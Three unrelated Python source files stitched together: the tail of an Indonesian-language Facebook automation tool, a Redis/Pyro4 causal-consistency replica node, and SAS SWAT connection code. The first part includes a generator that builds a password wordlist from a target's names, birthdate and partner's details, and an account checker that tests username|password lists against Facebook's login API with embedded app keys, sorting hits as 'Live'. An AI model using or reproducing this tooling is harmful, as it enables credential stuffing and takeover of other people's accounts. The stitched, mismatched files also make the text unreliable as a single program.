print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
NodeCausal.py
|
#!/usr/bin/python3
import redis
import os
import threading
import Pyro4
import Pyro4.naming
import sys
import time
# Node class that points to the redis server on the local machine
# Primary-based implementation for causal consistency
class Node(object):
# Initializes the connection to the indicated redis instance
# via ip/hostname & port
def __init__(self, r_ip, r_port, name, nameserver):
self.r_instance = redis.Redis(host = r_ip, port = r_port)
self.name = name
self.pid = os.getpid()
self.timestamp = 0
# This refers to Mr in the algorithm on the slides
# Max timestamp of all writes received by this replica
self.max_write_timestamp = 0
self.name_server = nameserver
# Updates the logical timestamp
@Pyro4.expose
def update_timestamp(self, ts_1, ts_2):
self.timestamp = max(ts_1, ts_2) + 1
# Get primary
# Returns the dictionary containing the sequencer
@Pyro4.expose
def get_primary(self):
return self.name_server.list(metadata_all={"primary"})
# Get all names from name server
# Returns dict name-to-uri
@Pyro4.expose
def get_all_replicas(self):
return self.name_server.list(metadata_all={"replica"})
# Sends message to all replicas
@Pyro4.expose
def send_to_all(self, msg_timestamp, msg_key, msg_value):
replica_dict = self.get_all_replicas()
msg = (msg_timestamp, msg_key, msg_value)
# For testing purposes, to slow propagation
time.sleep(1)
for r in replica_dict.keys():
replica = Pyro4.Proxy(replica_dict[r])
replica.rcv_msg(msg)
# For testing purposes, to slow propagation
time.sleep(1)
# Receives write messages from primary
@Pyro4.expose
def rcv_msg(self, msg):
msg_timestamp, msg_key, msg_value = msg
self.update_timestamp(msg_timestamp, self.timestamp)
self.max_write_timestamp = self.timestamp
self.r_instance.set(msg_key, msg_value)
print(f"Replica at pid: {self.pid} has set key:\"{msg_key}\" and value:\"{msg_value}\"")
# Does a local read on the redis instance and returns the
# value if there is one.
@Pyro4.expose
def get(self, key, client_timestamp):
self.update_timestamp(client_timestamp, self.timestamp)
while True:
# If return rule is satisfied, return
if self.max_write_timestamp > client_timestamp:
db_ret = self.r_instance.get(key)
if db_ret is None:
return None
else:
return self.r_instance.get(key).decode('utf-8')
# Else, wait
else:
print(f"Node at pid:{self.pid} has not received the update yet.")
# Enforce delay for testing
time.sleep(1)
continue
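    # Worked example of the return rule above (illustrative): a client whose last
    # observed timestamp is 5 calls get(key, 5); the loop spins until this
    # replica's max_write_timestamp exceeds 5, i.e. until the write the client
    # depends on has been applied locally.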
# Causal consistency implemented with primary-based protocol
    # This assumes all writes go to the primary (a single primary is assumed for all objects)
@Pyro4.expose
def set(self, key, value, client_timestamp):
# Updates timestamp
self.update_timestamp(client_timestamp, self.timestamp)
# If the node is the primary, local write
if self.name == "primary":
self.r_instance.set(key, value)
            # Call to propagate the write to the replicas, then return immediately
msg = (self.timestamp, key, value)
send = threading.Thread(target=self.send_to_all, args=msg)
send.start()
return self.timestamp, f"Ok, key: {key} and value: {value} have been set on the primary with pid:{self.pid}."
# Starts and daemonize this node.
def main(r_ip, r_port, ns_ip, ns_port, name):
daemon = Pyro4.Daemon()
ns = Pyro4.locateNS(host=ns_ip, port=int(ns_port))
node = Node(r_ip, int(r_port), name, ns)
uri = daemon.register(node)
if name == "primary":
ns.register("primary", uri, metadata={"primary"})
else:
ns.register(name, uri, metadata={"replica"})
daemon.requestLoop()
if __name__ == '__main__':
main(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
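# --- Illustrative client sketch (not part of the original module) ---
# A minimal example of how a client could drive this Node, assuming a Pyro4
# name server is running and one node was registered under the name "primary"
# while the others carry the "replica" metadata tag (as done in main() above).
# The function name `_example_client` and its defaults are hypothetical.
def _example_client(ns_ip="localhost", ns_port=9090):
    ns = Pyro4.locateNS(host=ns_ip, port=ns_port)
    primary = Pyro4.Proxy(ns.lookup("primary"))
    ts = 0                                    # the client's logical timestamp
    # Writes always go to the primary; it returns its timestamp for the write.
    ts, status = primary.set("x", "42", ts)
    print(status)
    # Reads may go to any replica; get() blocks until the replica has applied
    # a write at least as recent as the client's timestamp.
    for name, uri in ns.list(metadata_all={"replica"}).items():
        replica = Pyro4.Proxy(uri)
        print(name, replica.get("x", ts))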
|
connection.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Class for creating CAS sessions
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import collections
import contextlib
import copy
import inspect
import itertools
import json
import os
import random
import re
import six
import warnings
import weakref
from six.moves.urllib.parse import urlparse
from . import rest
from .. import clib
from .. import config as cf
from ..exceptions import SWATError, SWATCASActionError, SWATCASActionRetry
from ..logging import logger
from ..utils.config import subscribe, get_option
from ..clib import errorcheck
from ..utils.compat import (a2u, a2n, int32, int64, float64, text_types,
binary_types, items_types, int_types, dict_types)
from ..utils import getsoptions
from ..utils.args import iteroptions
from ..formatter import SASFormatter
from .actions import CASAction, CASActionSet
from .table import CASTable
from .transformers import py2cas
from .request import CASRequest
from .response import CASResponse
from .results import CASResults
from .utils.params import ParamManager, ActionParamManager
from .utils.misc import super_dir, any_file_exists
# pylint: disable=W0212
RETRY_ACTION_CODE = 0x280034
SESSION_ABORTED_CODE = 0x2D51AC
def _option_handler(key, value):
''' Handle option changes '''
sessions = list(CAS.sessions.values())
key = key.lower()
if key == 'cas.print_messages':
key = 'print_messages'
elif key == 'cas.trace_actions':
key = 'trace_actions'
elif key == 'cas.trace_ui_actions':
key = 'trace_ui_actions'
else:
return
for ses in sessions:
ses._set_option(**{key: value})
subscribe(_option_handler)
def _lower_actionset_keys(asinfo):
'''
Lowercase action set information keys
Parameters
----------
asinfo : dict
Action set reflection information
Returns
-------
dict
Same dictionary with lower-cased action / param keys
'''
for act in asinfo.get('actions', []):
act['name'] = act['name'].lower()
for param in act.get('params', []):
param['name'] = param['name'].lower()
if 'parmList' in param:
param['parmList'] = _lower_parmlist_keys(param['parmList'])
if 'exemplar' in param:
param['exemplar'] = _lower_parmlist_keys(param['exemplar'])
return asinfo
def _lower_parmlist_keys(parmlist):
'''
Lowercase parmList/exemplar keys
Parameters
----------
parmlist : list
parmList or exemplar reflection information
Returns
-------
list
Same list with lower-cased name keys
'''
for parm in parmlist:
parm['name'] = parm['name'].lower()
if 'parmList' in parm:
parm['parmList'] = _lower_parmlist_keys(parm['parmList'])
if 'exemplar' in parm:
parm['exemplar'] = _lower_parmlist_keys(parm['exemplar'])
return parmlist
@six.python_2_unicode_compatible
class CAS(object):
'''
Create a connection to a CAS server.
Parameters
----------
hostname : string or list-of-strings, optional
Host or URL to connect to. This parameter can also be specified
by a ``CAS_URL`` or ``CAS_HOST`` environment variable.
port : int or long, optional
Port number. If not specified, the value will come from the
``cas.port`` option or ``CAS_PORT`` environment variable.
If a URL is specified in the first parameter, that port number
will be used.
username : string, optional
Name of user on CAS host. This parameter can also be specified
in a ``CAS_USER`` environment variable.
password : string, optional
Password of user on CAS host or OAuth token. If an OAuth token
is specified, the `username` parameter should be None.
This parameter can also be specified in a ``CAS_PASSWORD``
or ``CAS_TOKEN`` environment variable.
session : string, optional
ID of existing session to reconnect to.
locale : string, optional
Name of locale used for the session.
name : string, optional
User-definable name for the session.
nworkers : int or long, optional
Number of worker nodes to use.
authinfo : string or list-of-strings, optional
The filename or list of filenames of authinfo/netrc files used
for authentication.
protocol : string, optional
The protocol to use for communicating with the server.
This protocol must match the protocol spoken by the specified
server port. If the first parameter is a URL, that protocol will
be used.
path : string, optional
Base path of URL when using the REST protocol.
ssl_ca_list : string, optional
The path to the SSL certificates for the CAS server.
**kwargs : any, optional
Arbitrary keyword arguments used for internal purposes only.
Raises
------
IOError
When a connection can not be established.
Returns
-------
:class:`CAS` object
Examples
--------
To create a connection to a CAS host, you simply supply a hostname
(or list of hostnames), a port number, and user credentials. Here is
an example specifying a single hostname, and username and password as
strings.
>>> conn = swat.CAS('mycashost.com', 5570, 'username', 'password')
If you use an authinfo file and it is in your home directory, you don't
have to specify any username or password. You can override the authinfo
file location with the authinfo= parameter. This form also works for
Kerberos authentication.
>>> conn = swat.CAS('mycashost.com', 5570)
If you specify multiple hostnames, it will connect to the first available
server in the list.
>>> conn = swat.CAS(['mycashost1.com', 'mycashost2.com', 'mycashost3.com'],
5570, 'username', 'password')
URLs can also be used for both binary and REST protocols. Notice that
you need to specify the username= and password= keywords since the
port number is skipped.
>>> conn = swat.CAS('cas://mycashost1.com:5570',
... username='username', password='password')
>>> conn = swat.CAS('http://mycashost1.com:80',
... username='username', password='password')
To connect to an existing CAS session, you specify the session identifier.
>>> conn = swat.CAS('mycashost.com', 5570,
... session='ABCDEF12-ABCD-EFG1-2345-ABCDEF123456')
If you wish to change the locale used on the server, you can use the
locale= option.
>>> conn = swat.CAS('mycashost.com', 5570, locale='es_US')
To limit the number of worker nodes in a grid, you use the nworkers=
parameter.
>>> conn = swat.CAS('mycashost.com', 5570, nworkers=4)
'''
trait_names = None # Block IPython's query for this
sessions = weakref.WeakValueDictionary()
_sessioncount = 1
@classmethod
def _expand_url(cls, url):
''' Expand [...] groups in URL to all linear combinations '''
if not isinstance(url, items_types):
url = [url]
out = []
for item in url:
parts = [x for x in re.split(r'(?:\[|\])', item) if x]
for i, part in enumerate(parts):
if ',' in part:
parts[i] = re.split(r'\s*,\s*', part)
# elif re.match(r'^\d+\-\d+$', part):
# start, end = part.split('-')
# width = len(start)
# start = int(start)
# end = int(end)
# parts[i] = [('%%0%sd' % width) % x for x in range(start, end+1)]
else:
parts[i] = [part]
out += list(''.join(x) for x in itertools.product(*parts))
return out
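    # Illustrative expansion (hypothetical hostnames): a bracketed,
    # comma-separated group produces every combination, e.g.
    #   CAS._expand_url('cas://rdcgrd[001,002].example.com:5570')
    #   -> ['cas://rdcgrd001.example.com:5570', 'cas://rdcgrd002.example.com:5570']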
@classmethod
def _get_connection_info(cls, hostname, port, username, password, protocol, path):
''' Distill connection information from parameters, config, and environment '''
# Get defaults from config, if needed
username = username or cf.get_option('cas.username')
password = password or cf.get_option('cas.token')
protocol = protocol or cf.get_option('cas.protocol')
hostname = hostname or cf.get_option('cas.hostname')
port = port or cf.get_option('cas.port')
logger.debug('Connection info: hostname=%s port=%s protocol=%s '
'username=%s password=%s path=%s',
hostname, port, protocol, username, password, path)
# Always make hostname a list
if not isinstance(hostname, items_types):
hostname = re.split(r'\s+', re.sub(r'\s*,\s*', r',', hostname.strip()))
else:
hostname = [re.sub(r'\s*,\s*', r',', x.strip()) for x in hostname]
# Check hostname for other components
new_hostname = []
for name in hostname:
if not re.match(r'^\w+://', hostname[0]):
new_hostname.append('%s://%s' % (protocol, name))
else:
new_hostname.append(name)
hostname = cls._expand_url(new_hostname)
urlp = urlparse(hostname[0])
protocol = urlp.scheme or protocol
hostname = [urlparse(x).hostname for x in hostname]
port = urlp.port or port
username = urlp.username or username
password = urlp.password or password
path = urlp.path or path
# Set port based on protocol, if port number is missing
if not port:
if protocol == 'http':
port = 80
elif protocol == 'https':
port = 443
elif protocol == 'cas':
port = 5570
else:
raise SWATError('Port number was not specified')
# Auto-detect protocol if still missing
if protocol == 'auto':
protocol = cls._detect_protocol(hostname, port, protocol=protocol)
if protocol not in ['http', 'https', 'cas']:
raise SWATError('Unrecognized protocol: %s' % protocol)
# For http(s), construct URLs
if protocol.startswith('http'):
urls = []
for name in hostname:
url = '%s://%s:%s' % (protocol, name, port)
if path:
url = '%s/%s' % (url, re.sub(r'^/+', r'', path))
urls.append(url)
hostname = ' '.join(urls)
logger.debug('Distilled connection parameters: '
"url='%s' username=%s", urls, username)
else:
hostname = ' '.join(hostname)
logger.debug('Distilled connection parameters: '
"hostname='%s' port=%s, username=%s, protocol=%s",
hostname, port, username, protocol)
return a2n(hostname), int(port), a2n(username), a2n(password), a2n(protocol)
def __init__(self, hostname=None, port=None, username=None, password=None,
session=None, locale=None, nworkers=None, name=None,
authinfo=None, protocol=None, path=None, ssl_ca_list=None,
**kwargs):
# Filter session options allowed as parameters
_kwargs = {}
sess_opts = {}
for k, v in kwargs.items():
if k.lower() in ['caslib', 'metrics', 'timeout', 'timezone']:
sess_opts[k] = v
else:
_kwargs[k] = v
kwargs = _kwargs
# Check for unknown connection parameters
unknown_keys = [k for k in kwargs if k not in ['prototype']]
if unknown_keys:
warnings.warn('Unrecognized keys in connection parameters: %s' %
', '.join(unknown_keys))
# If a prototype exists, use it for the connection config
prototype = kwargs.get('prototype')
if prototype is not None:
soptions = a2n(prototype._soptions)
protocol = a2n(prototype._protocol)
else:
# Distill connection information from parameters, config, and environment
hostname, port, username, password, protocol = \
self._get_connection_info(hostname, port, username,
password, protocol, path)
soptions = a2n(getsoptions(session=session, locale=locale,
nworkers=nworkers, protocol=protocol))
# Check for SSL certificate
if ssl_ca_list is None:
ssl_ca_list = cf.get_option('cas.ssl_ca_list')
if ssl_ca_list:
logger.debug('Using certificate file: %s', ssl_ca_list)
os.environ['CAS_CLIENT_SSL_CA_LIST'] = ssl_ca_list
# Check for explicitly specified authinfo files
if authinfo is not None:
if not any_file_exists(authinfo):
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
                raise OSError('None of the specified authinfo files from '
'list exist: %s' % ', '.join(authinfo))
# Create error handler
try:
if protocol in ['http', 'https']:
self._sw_error = rest.REST_CASError(soptions)
else:
self._sw_error = clib.SW_CASError(soptions)
except SystemError:
raise SWATError('Could not create CAS error handler object. '
'Check your SAS TK path setting.')
# Make the connection
try:
# Make a copy of the prototype connection
if prototype is not None:
self._sw_connection = errorcheck(prototype._sw_connection.copy(),
prototype._sw_connection)
# Create a new connection
else:
# Set up authinfo paths
if authinfo is not None and password is None:
password = ''
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
for item in authinfo:
password += '{%s}' % item
password = 'authinfo={%s}' % password
# Set up connection parameters
params = (hostname, port, username, password, soptions, self._sw_error)
if protocol in ['http', 'https']:
self._sw_connection = rest.REST_CASConnection(*params)
else:
self._sw_connection = clib.SW_CASConnection(*params)
# If we don't have a connection, bail out.
if self._sw_connection is None:
raise SystemError
except SystemError:
raise SWATError(self._sw_error.getLastErrorMessage())
# Set up index origin for error messages
errorcheck(self._sw_connection.setZeroIndexedParameters(), self._sw_connection)
# Get instance structure values from connection layer
self._hostname = errorcheck(
a2u(self._sw_connection.getHostname(), 'utf-8'), self._sw_connection)
self._port = errorcheck(self._sw_connection.getPort(), self._sw_connection)
self._username = errorcheck(
a2u(self._sw_connection.getUsername(), 'utf-8'), self._sw_connection)
self._session = errorcheck(
a2u(self._sw_connection.getSession(), 'utf-8'), self._sw_connection)
self._soptions = errorcheck(
a2u(self._sw_connection.getSOptions(), 'utf-8'), self._sw_connection)
self._protocol = protocol
if name:
self._name = a2u(name)
else:
self._name = 'py-session-%d' % type(self)._sessioncount
type(self)._sessioncount = type(self)._sessioncount + 1
# Caches for action classes and reflection information
self._action_classes = {}
self._action_info = {}
self._actionset_classes = {}
self._actionset_info = {}
# Dictionary of result hook functions
self._results_hooks = {}
# Get server attributes
(self.server_type,
self.server_version,
self.server_features) = self._get_server_features()
# Preload __dir__ information. It will be extended later with action names
